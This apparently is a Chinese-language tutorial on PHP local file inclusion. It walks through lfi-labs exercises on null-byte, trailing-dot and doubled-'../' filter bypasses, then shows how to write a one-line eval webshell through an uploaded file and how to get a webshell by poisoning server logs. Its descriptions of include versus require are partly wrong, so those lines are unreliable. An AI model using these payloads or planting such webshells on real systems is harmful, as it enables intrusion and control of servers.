文章目录
文件包含漏洞产生原因
在包含文件时,为了灵活包含文件,将被包含文件设置为变量,同过动态变量来引入需要包含的文件时,用户可以对变量的值可控未对变量值进行合理的效验或者效验被绕过,这样就导致了文件包含漏洞
文件包含函数
include //会生成致命错误并停止脚本
include_once //语句在脚本执行期间包含并运行指定文件
require //只生成警告(E_WARNING),并且脚本会继续
require_once //断一下这个文件在之前是否已经被包含过,如已经包含,则忽略本次包含
文件包含漏洞分类
- 本地文件包含
- 远程文件包含
allow_url_fopen为On时,能读取远程文件,列如file_get_contents()就能读远程文件
allow_url_include为On时,就可以使用include和require等方式包含文件
文件包含靶场练习
靶场下载:lfi-labs-master
LFI-1
简单的文件包含漏洞,可以包含主机上的所有文件,被包含的文件都会被当做php执行,文件包含可以是相对路径使用“…/”跳到上级目录,也可是绝对路径“c:\1.txt”
LFI-2 %00阶段绕过
代码
<?php include("includes/".$_GET['library'].".php"); ?>
包含phpinfo.php时会变成
../../../phpinfo.php.php
这个文件系统认不出来就不会执行,使用%00截断绕过
../../../phpinfo.php%00.php //%00后边的会被截断
也可以使用系统特性绕过
window下当文件名大于256之后的会被丢弃掉
...............................................................................................................................................................................................................................................................
LFI- 3 后缀加点.绕过
代码
<?php
if (substr($_GET['file'], -4, 4) != '.php')//截取传参的后4位,如果等于.php,不允许查看文件
echo file_get_contents($_GET['file']);
else
echo 'You are not allowed to see source files!'."\n";
?>
输入当输入…/…/phpinfo.php时,截取后4位检测到是.php就无法查看文件
使用phpinfo.php. 截取后4位php. 检测不到就会执行,执行时计算机会自动的把后面的点去掉
LFI- 4 不加后缀绕过
代码
<form action="/LFI-4/index.php" method="GET">
<input type="text" name="class">
</form>
<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>
addslashes函数过滤了空字符%00无法使用,不加后缀即可绕过
LFI- 5 双写绕过
代码
<?php
$file = str_replace('../', '', $_GET['file']);//把传参中带有../的字符替换成空
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
…/被替换成空,使用双写绕过…/./,经过一次替换成空后变成…/
# 文件包含利用
## 文件包含写shell
文件包含漏洞可以配合文件上传写shell,假设1.txt是我们上传的图片,里面写着下列代码
```php
<?php fputs(fopen('shell.php','w'),'<?php eval($_REQUEST[1]);?>');?>//生成一个文件shell.php,里面内容<?php eval($_REQUEST[1])>
当我们包含这个txt文件的时候,会被当做PHP解析,里面的代码就会执行
生成一个shell.php
里面的内容写着一句话木马
包含日志文件获取webshell
利用条件要有文件包含漏洞,要知道日志文件的路径
当我们访问下面的url的时候,记录会被记录在日志文件中
查看日志,访问的地址在日志中
里面的php代码<?被浏览器自动编码使用burp抓包修改即可
包含日志文件
file_put_contents(‘1.php’,’<?php eval($_REQUEST(‘a’))>’);